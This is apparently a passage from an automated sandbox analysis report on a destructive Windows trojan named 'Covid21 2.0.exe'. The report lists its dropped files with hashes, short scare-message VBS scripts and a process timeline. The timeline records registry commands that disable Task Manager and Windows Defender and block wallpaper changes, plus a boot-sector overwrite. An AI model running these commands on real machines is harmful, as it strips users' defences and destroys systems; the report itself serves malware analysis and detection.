                                SHA-256:E3760C671CEC108580D47B0F8C11AE79E9DF9941D2E878032EEDA1B510F91231
                                SHA-512:9C0109A8E7DE5EA42B3CE8788A412F6ED1158AFD3DB87884034631DA15EC4C16275F0578C6AD438E91DC203C89AEF725D2642E06B751DF5CFF0D47B3D9A1AD1E
                                Malicious:false
                                C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):107828
                                Entropy (8bit):5.4025127824732335
                                Encrypted:false
                                SSDEEP:1536:eb4k5iT76crYyIyLIOwu3yUywCbsR+EKDyfq1aX:eb4N36cHIyLGMbzX
                                MD5:3CA1D5768C2944D4284B1541653823C7
                                SHA1:85CF021AC23CD1340C6D649E6A77A213C1F848B6
                                SHA-256:4172C6120F8F98685698365D6DD52C80EB2080203CDDE479009BF8F4FA770AF0
                                SHA-512:7972ADB329DBEBC347B8A68789BBAC4BA7C230CC980910D18A322D1A512015633D2A5801E76C0AAE2FCFE120790C69417864549787DFC37574FB0AA3BFC202F0
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 13%
                                Joe Sandbox View:
                                • Filename: Covid21 2.0.exe, Detection: malicious, Browse
                                C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):367616
                                Entropy (8bit):6.563758955317025
                                Encrypted:false
                                SSDEEP:6144:qizJVFAO7rdGlh4sQstCPhiomhiGM80JCMlTe06z0aPawSoQBAlAq4SYwhl:RJ/AO7rAlys3tCj80x6zlawSo5Aq4Xwv
                                MD5:EBB811D0396C06A70FE74D9B23679446
                                SHA1:E375F124A8284479DD052161A07F57DE28397638
                                SHA-256:28E979002CB4DB546BF9D9D58F5A55FD8319BE638A0974C634CAE6E7E9DBCD89
                                SHA-512:1DE3DCD856F30004BECEE7C769D62530F3A5E9785C853537ADC0A387D461C97B305F75CBAF13F278DD72BA22D4650E92C48EDF3C3A74B13ED68FFC0D45E13774
                                Malicious:true
                                Antivirus:
                                • Antivirus: Metadefender, Detection: 6%, Browse
                                • Antivirus: ReversingLabs, Detection: 48%
                                C:\Users\user\AppData\Local\Temp\2526.tmp\mlt.exe
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):133205
                                Entropy (8bit):5.137252527177841
                                Encrypted:false
                                SSDEEP:1536:cPFc9HtJsjy6maNXRBOseWG7NVW/ZTAUvMFMQiNXR/QRBX1bXckplRU:sS9N+fB47NVW/ZToWRofXZX5lRU
                                MD5:A4E26D32F9655DBE8EFD276A530EB02B
                                SHA1:D194526518FDDD34BFC75CC0575D9B5CF3E1E304
                                SHA-256:4C2277C81CBF6C415AB874CFB32D3B0049C8B18AC7EEE1DD6C1F5D9F5F043C83
                                SHA-512:E77C58B321A1C696554B018CC51FAD2F2DF4BAC39FA90F17A83EC646C90D67B6DA5FCCB2E80C468E2CF32CC7F9F3F62B160C3F0AFBC2130FAA1002ECDE5B5676
                                Malicious:true
                                C:\Users\user\AppData\Local\Temp\2526.tmp\prompt.vbs
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):188
                                Entropy (8bit):4.787831418201213
                                Encrypted:false
                                SSDEEP:3:KRCWhCOHGJ5FcFP01RFPKO9/zRWPxBIXFMlkLvxWeeXlVSpXAov/FLVS9AD:KI/NJSyd/sKFMlCvxW3S3NpSyD
                                MD5:82C0A5E92259FF193B914E6C0D7C8A7A
                                SHA1:ED6868EFF7055555689E613A62F4275EAFA97C36
                                SHA-256:02E3663BB7BC9F8FE4377887DC24E63FC83187BE9CB0181F87E5F93AF4C7CA8B
                                SHA-512:43C1EF453531200DD625945A65727DAEF28EE480FB210E97846633841F8215261E3195A8BE77C280E8B6FE193B59C7367302C3FC74879B5952FA31F3235DDB62
                                Malicious:false
                                Preview: intAnswer = _.. Msgbox("This Trojan is no joke, do you want to run it?", _.. vbYesNo, "Covid-21")..If intAnswer = vbYes Then.. WScript.Quit 1..Else.. WScript.Quit 0..End If
                                C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):113664
                                Entropy (8bit):7.838778904595643
                                Encrypted:false
                                SSDEEP:1536:o0J9QXrssV7g4Rq3b24oFDo2mL7oagiBGVHo8J75qUbGuNxTJeqq62hxcmpn6izz:o0J9QbLkewys+C6pNxFE7Z6wAO
                                MD5:E87A04C270F98BB6B5677CC789D1AD1D
                                SHA1:8C14CB338E23D4A82F6310D13B36729E543FF0CA
                                SHA-256:E03520794F00FB39EF3CFFF012F72A5D03C60F89DE28DBE69016F6ED151B5338
                                SHA-512:8784F4D42908E54ECEDFB06B254992C63920F43A27903CCEDD336DAAEED346DB44E1F40E7DB971735DA707B5B32206BE1B1571BC0D6A2D6EB90BBF9D1F69DE13
                                Malicious:true
                                Antivirus:
                                • Antivirus: Metadefender, Detection: 36%, Browse
                                • Antivirus: ReversingLabs, Detection: 62%
                                C:\Users\user\AppData\Local\Temp\2526.tmp\t.vbs
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.385220179839388
                                Encrypted:false
                                SSDEEP:3:rCmFOIaPMogDXK+8YHSv:FFJaCDXxDHc
                                MD5:EE0306A79AAEFBD4CF3BC7E5F8A0D3B1
                                SHA1:32DAE2CFB0AF831F0E8445F36C0D2CE0FE9B2E88
                                SHA-256:969AE83F1366975BECE266C3BE5994291C55302E93564A1435FE542B456904EC
                                SHA-512:FDFAB128F4F096F4B4DD31758116522337644F269CB28E1496E20D866083BF31D277A123704E8924A0FC4EF0212CBA89E3AB9FDDCAFFCF400C859C8DF87736FD
                                Malicious:true
                                Preview: msgbox "Your Windows will die from Covid-21 Corona Virus" ..
                                C:\Users\user\AppData\Local\Temp\2526.tmp\x.vbs
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):79
                                Entropy (8bit):4.403941477424042
                                Encrypted:false
                                SSDEEP:3:xDCHGF6IX8SAfPMtjxdMzlyJ4:xYGFr8jfkjxdMRyJ4
                                MD5:7740551865A57633B3E92986352DFA1B
                                SHA1:74070B3636B69B710C32996FC1640129202F4CAF
                                SHA-256:8A36ECC37EB454FE13B4B31EB9EDA67919AA5DD3A474480930982EF93334499A
                                SHA-512:B4C5902F3CA91FA83EC0297254ACF5F63B2145500863AFB86F96B9C2D3844C8C476CD0F6DD31E3EB92C4ACA2CD35C2F6BE563549817B676FA9B4592F280C79F2
                                Malicious:true
                                Preview: do ..msgbox "Covid-21 is here! Your Windows will get destroyed soon!" ..loop ..
                                C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):24
                                Entropy (8bit):3.938721875540868
                                Encrypted:false
                                SSDEEP:3:rCmFLFDgov:FFxJ
                                MD5:5ECB02EAAA322BE4DF7F61A1A23C799D
                                SHA1:BEC83A2546F38A7133EF962D09CD520F87E5ABB2
                                SHA-256:D78710D080D6200BFF04D443F8FA923F619914FB191DC2B3865DA1F3D9739E30
                                SHA-512:2306F4FC08E0AEFE4A44C4507E46EE2D3D808423EC8D31980980F785E20C0DF301A9B3D9A2469D609E054D5A8AC4089AC39FFB388B70ED8A36F688B4362A2F88
                                Malicious:true
                                Preview: msgbox "corona virus" ..
                                C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):422029
                                Entropy (8bit):6.688336510135275
                                Encrypted:false
                                SSDEEP:12288:5NIQAPGsAqY9IMVYd38sJdpQHlGlY8KfTQ:uPGSY91VwNJcFMqTQ
                                MD5:A7CE5BEE03C197F0A99427C4B590F4A0
                                SHA1:14D8617C51947FB49B3ABA7E9AECE83E5094CF71
                                SHA-256:0C53A3EC2B432A9013546F92416109D7E8F64CEA26AC2491635B4CF2A310D852
                                SHA-512:7F3C56C42D899ADA5ACDC5C162391F9FA06455DB08E6DF0A57132CA5B1BB3D52E6DBC9342310480D45AA32915502ACEB7552375A45D3FD1A54FEE0E73AF6024A
                                Malicious:true
                                Antivirus:
                                • Antivirus: Metadefender, Detection: 0%, Browse
                                • Antivirus: ReversingLabs, Detection: 7%
                                C:\Windows\clwcp.bmp
                                Process:C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe
                                File Type:PC bitmap, Windows 3.x format, 1920 x 1080 x 24
                                Category:dropped
                                Size (bytes):6220854
                                Entropy (8bit):6.660583803059703
                                Encrypted:false
                                SSDEEP:24576:cjUJucwO/CkHCoUQnI7Er5OBVB8JCsMjdsWYDaFWiG0SQbrGJVXVuBX0j6BHpsPH:gUJucwHkHlUQ9QBr8nMqVD/6SbuB8BV
                                MD5:1A6ACC65486762EE05D1ABD90169CAF2
                                SHA1:12DB4A705D5DBDA06625FA38FC6B1A6AD73FD0B9
                                SHA-256:0733EE5D3CF3B3E574C3A052C78DFC0D9791A7099DFAA8D3A0372075496311B3
                                SHA-512:D4B2E9E7261FF91DB206242314D50C66978E0353E113D72BC48637A41D12D3CFA00C5F04B2A744937769CD433ABADB9872C72CF158A9F0863B9F40B6962D27D5
                                Malicious:false
                                C:\covid21\Corona.exe
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):531456
                                Entropy (8bit):7.007155751747995
                                Encrypted:false
                                SSDEEP:12288:bt007p82D5NYQ1bjLXHfNOTliq6G8/Q3Uk+leP4RG3:2qpzvYQ1Tfoi8b3U1kaq
                                MD5:6374CA8AD59246DFED4794FD788D6560
                                SHA1:D54281430AD11272F657DE4E909B4BA7B8561821
                                SHA-256:25B6F4ABC0B8A7A3F3CAE54A2F75810B977C0F5ED20AF98E77BE9449E7135108
                                SHA-512:0434F5C6ECD1A036A59E2F5DE56F0905460D46C31FFF6A7F160F54CFBCB56EA2DA22647D564E53D66C47A789A67D165C59E64D924B0F2CF80FDCD865847A772F
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 8%
                                C:\covid21\covid.jpg
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 1920x1080, frames 3
                                Category:dropped
                                Size (bytes):170445
                                Entropy (8bit):7.987389688426996
                                Encrypted:false
                                SSDEEP:3072:mTwQIE+8Tj6wFrxGxGtSdWyCmI5KkeD8vcWtTH3Mi/gc+P9IP7HwKFKBlrF:qOE+o6hgcYLmI5+8k+TH3Mi/J+Pi7Hwn
                                MD5:94AD752ABC09644D0B91A07022ECB000
                                SHA1:7EE97DC56E62E7B2D86EE892E7CF70673252242F
                                SHA-256:E3760C671CEC108580D47B0F8C11AE79E9DF9941D2E878032EEDA1B510F91231
                                SHA-512:9C0109A8E7DE5EA42B3CE8788A412F6ED1158AFD3DB87884034631DA15EC4C16275F0578C6AD438E91DC203C89AEF725D2642E06B751DF5CFF0D47B3D9A1AD1E
                                Malicious:false
                                \Device\Harddisk0\DR0
                                Process:C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe
                                File Type:DOS/MBR boot sector
                                Category:dropped
                                Size (bytes):12288
                                Entropy (8bit):3.0505993617935707
                                Encrypted:false
                                SSDEEP:96:CHNWrlndausdjYdjdRRYYyWNt5UIm9iD6gYOAFCgNfMrk:CtWbds1YdRdNHZm9iDPY6g8k
                                MD5:84FA41E4FEF5AA7996B2249DD344D541
                                SHA1:AA23B3211D81A35B9A1FB99CA18D6E15FDE230C6
                                SHA-256:F35C7820202E4FD04F3C35A4E2F3719A1A5FD236B6A623B28909B43DC1C00AB4
                                SHA-512:CCDA181C489350F2ECBDFF58AFD8D639BCA38392BD24FDC27C58B42213B824898E7C2023C7531A70FE830304E820E0EDCF745831849E53F2AE880C33A87A1B22
                                Malicious:true

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Entropy (8bit):7.7326173175378665
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.39%
                                • UPX compressed Win32 Executable (30571/9) 0.30%
                                • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                File name:Covid21 2.0.exe
                                File size:1210880
                                MD5:a7c7f5e792809db8653a75c958f82bc4
                                SHA1:7ebe75db24af98efdcfebd970e7eea4b029f9f81
                                SHA256:02fea9970500d498e602b22cea68ade9869aca40a5cdc79cf1798644ba2057ca
                                SHA512:feb42cc7b4f344c043bda8bebeefa8cbb68406d1e937dcdc5a403981f79587fa438c682c4744a47a77482fc049b0334806d468aeb67edd4a92d90b5acd0c16ae
                                SSDEEP:24576:kweQ5x+HPXJ9N2qifMpZcu/6z6toe20xYuLFzY77+89J9o2:kwVeHhH2qoMIum62uhY7Kco2
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'..L...............2.`...0...P..0.)..`....)...@...........................,............................................

                                File Icon

                                Icon Hash:4c8e2b2f0f030e0d

                                Static PE Info

                                General

                                Entrypoint:0x69aa30
                                Entrypoint Section:UPX1
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                DLL Characteristics:
                                Time Stamp:0x4CD7F727 [Mon Nov 8 13:12:07 2010 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:1d88d597200c0081784c27940d743ec5

                                Entrypoint Preview

                                Instruction
                                pushad
                                mov esi, 005A6015h
                                lea edi, dword ptr [esi-001A5015h]
                                push edi
                                mov ebp, esp
                                lea ebx, dword ptr [esp-00003E80h]
                                xor eax, eax
                                push eax
                                cmp esp, ebx
                                jne 00007F1CECB0260Dh
                                inc esi
                                inc esi
                                push ebx
                                push 00298988h
                                push edi
                                add ebx, 04h
                                push ebx
                                push 000F4A0Bh
                                push esi
                                add ebx, 04h
                                push ebx
                                push eax
                                mov dword ptr [ebx], 00020003h
                                nop
                                nop
                                nop
                                nop
                                nop
                                push ebp
                                push edi
                                push esi
                                push ebx
                                sub esp, 7Ch
                                mov edx, dword ptr [esp+00000090h]
                                mov dword ptr [esp+74h], 00000000h
                                mov byte ptr [esp+73h], 00000000h
                                mov ebp, dword ptr [esp+0000009Ch]
                                lea eax, dword ptr [edx+04h]
                                mov dword ptr [esp+78h], eax
                                mov eax, 00000001h
                                movzx ecx, byte ptr [edx+02h]
                                mov ebx, eax
                                shl ebx, cl
                                mov ecx, ebx
                                dec ecx
                                mov dword ptr [esp+6Ch], ecx
                                movzx ecx, byte ptr [edx+01h]
                                shl eax, cl
                                dec eax
                                mov dword ptr [esp+68h], eax
                                mov eax, dword ptr [esp+000000A8h]
                                movzx esi, byte ptr [edx]
                                mov dword ptr [ebp+00h], 00000000h
                                mov dword ptr [esp+60h], 00000000h
                                mov dword ptr [eax], 00000000h
                                mov eax, 00000300h
                                mov dword ptr [esp+64h], esi
                                mov dword ptr [esp+5Ch], 00000001h
                                mov dword ptr [esp+58h], 00000001h
                                mov dword ptr [esp+54h], 00000001h

                                Data Directories

                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2cdf44 | 0x220 | .rsrc
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x29c000 | 0x31f44 | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                Sections

                                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                UPX0 | 0x1000 | 0x1a5000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                UPX1 | 0x1a6000 | 0xf6000 | 0xf5600 | False | 0.999160245797 | data | 7.99978608598 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                .rsrc | 0x29c000 | 0x33000 | 0x32200 | False | 0.41157360505 | data | 4.64567241992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                Resources

                                Name | RVA | Size | Type | Language | Country
                                RT_ICON | 0x29c250 | 0x31828 | data | |
                                RT_RCDATA | 0x3da74 | 0x5a4 | empty | |
                                RT_RCDATA | 0x3e018 | 0x25a4cf | empty | |
                                RT_RCDATA | 0x2984e8 | 0xbe | data | |
                                RT_RCDATA | 0x2985a8 | 0xb | data | |
                                RT_RCDATA | 0x2985b4 | 0x6 | Non-ISO extended-ASCII text, with no line terminators | |
                                RT_GROUP_ICON | 0x2cda7c | 0x14 | data | |
                                RT_VERSION | 0x2cda94 | 0x210 | data | |
                                RT_MANIFEST | 0x2cdca8 | 0x29c | XML 1.0 document, ASCII text, with very long lines, with no line terminators | |

                                Imports

                                DLL | Import
                                KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                COMCTL32.dll | InitCommonControls
                                GDI32.dll | SetBkColor
                                MSVCRT.dll | memset
                                OLE32.dll | CoInitialize
                                SHELL32.dll | ShellExecuteExA
                                SHLWAPI.dll | PathQuoteSpacesA
                                USER32.dll | IsChild

                                Version Infos

                                Description | Data
                                InternalName | covid-21
                                ProductName | covid21 corona virus
                                FileVersion | 2,0,0,0
                                ProductVersion | 2,0,0,0
                                FileDescription | Run this only on vm
                                Translation | 0x0000 0x04e4

                                Network Behavior

                                No network behavior found

                                System Behavior

                                General

                                Start time:15:53:07
                                Start date:28/03/2021
                                Path:C:\Users\user\Desktop\Covid21 2.0.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\Covid21 2.0.exe'
                                Imagebase:0x400000
                                File size:1210880 bytes
                                MD5 hash:A7C7F5E792809DB8653A75C958F82BC4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                General

                                Start time:15:53:08
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\2526.tmp\Covid21.bat' '
                                Imagebase:0x11d0000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:15:53:08
                                Start date:28/03/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff724c50000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:15:53:09
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\cscript.exe
                                Wow64 process (32bit):true
                                Commandline:cscript prompt.vbs
                                Imagebase:0xaf0000
                                File size:143360 bytes
                                MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                General

                                Start time:15:53:12
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\reg.exe
                                Wow64 process (32bit):true
                                Commandline:REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                Imagebase:0x2d0000
                                File size:59392 bytes
                                MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:15:53:13
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\reg.exe
                                Wow64 process (32bit):true
                                Commandline:Reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                Imagebase:0x2d0000
                                File size:59392 bytes
                                MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:15:53:14
                                Start date:28/03/2021
                                Path:C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe
                                Wow64 process (32bit):true
                                Commandline:clwcp c:\covid21\covid.jpg
                                Imagebase:0x400000
                                File size:517120 bytes
                                MD5 hash:E62EE6F1EFC85CB36D62AB779DB6E4EC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Antivirus matches:
                                • Detection: 4%, Virustotal, Browse
                                • Detection: 8%, Metadefender, Browse
                                • Detection: 0%, ReversingLabs
                                Reputation:low

                                General

                                Start time:15:53:18
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\reg.exe
                                Wow64 process (32bit):true
                                Commandline:reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
                                Imagebase:0x2d0000
                                File size:59392 bytes
                                MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:15:53:19
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\x.vbs'
                                Imagebase:0x2f0000
                                File size:147456 bytes
                                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:15:53:19
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /K coronaloop.bat
                                Imagebase:0x11d0000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:15:53:20
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\timeout.exe
                                Wow64 process (32bit):true
                                Commandline:timeout 5 /nobreak
                                Imagebase:0x260000
                                File size:26112 bytes
                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:15:53:20
                                Start date:28/03/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff724c50000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:15:53:20
                                Start date:28/03/2021
                                Path:C:\covid21\Corona.exe
                                Wow64 process (32bit):true
                                Commandline:c:\covid21\corona.exe
                                Imagebase:0x400000
                                File size:531456 bytes
                                MD5 hash:6374CA8AD59246DFED4794FD788D6560
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Antivirus matches:
                                • Detection: 8%, ReversingLabs
                                Reputation:low

                                General

                                Start time:15:53:25
                                Start date:28/03/2021
                                Path:C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe
                                Wow64 process (32bit):true
                                Commandline:inv.exe
                                Imagebase:0x400000
                                File size:367616 bytes
                                MD5 hash:EBB811D0396C06A70FE74D9B23679446
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Antivirus matches:
                                • Detection: 6%, Metadefender, Browse
                                • Detection: 48%, ReversingLabs
                                Reputation:low

                                General

                                Start time:15:53:25
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
                                Imagebase:0x2f0000
                                File size:147456 bytes
                                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:15:53:26
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\timeout.exe
                                Wow64 process (32bit):true
                                Commandline:timeout 5 /nobreak
                                Imagebase:0x260000
                                File size:26112 bytes
                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:15:53:31
                                Start date:28/03/2021
                                Path:C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe
                                Wow64 process (32bit):true
                                Commandline:z.exe
                                Imagebase:0x400000
                                File size:422029 bytes
                                MD5 hash:A7CE5BEE03C197F0A99427C4B590F4A0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 0%, Metadefender, Browse
                                • Detection: 7%, ReversingLabs

                                General

                                Start time:15:53:32
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
                                Imagebase:0x2f0000
                                File size:147456 bytes
                                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:15:53:32
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\timeout.exe
                                Wow64 process (32bit):true
                                Commandline:timeout 5 /nobreak
                                Imagebase:0x260000
                                File size:26112 bytes
                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:15:53:37
                                Start date:28/03/2021
                                Path:C:\Users\user\AppData\Local\Temp\2526.tmp\mlt.exe
                                Wow64 process (32bit):false
                                Commandline:mlt.exe
                                Imagebase:0x400000
                                File size:133205 bytes
                                MD5 hash:A4E26D32F9655DBE8EFD276A530EB02B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:15:53:38
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
                                Imagebase:0x2f0000
                                File size:147456 bytes
                                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:15:53:38
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\timeout.exe
                                Wow64 process (32bit):true
                                Commandline:timeout 5 /nobreak
                                Imagebase:0x260000
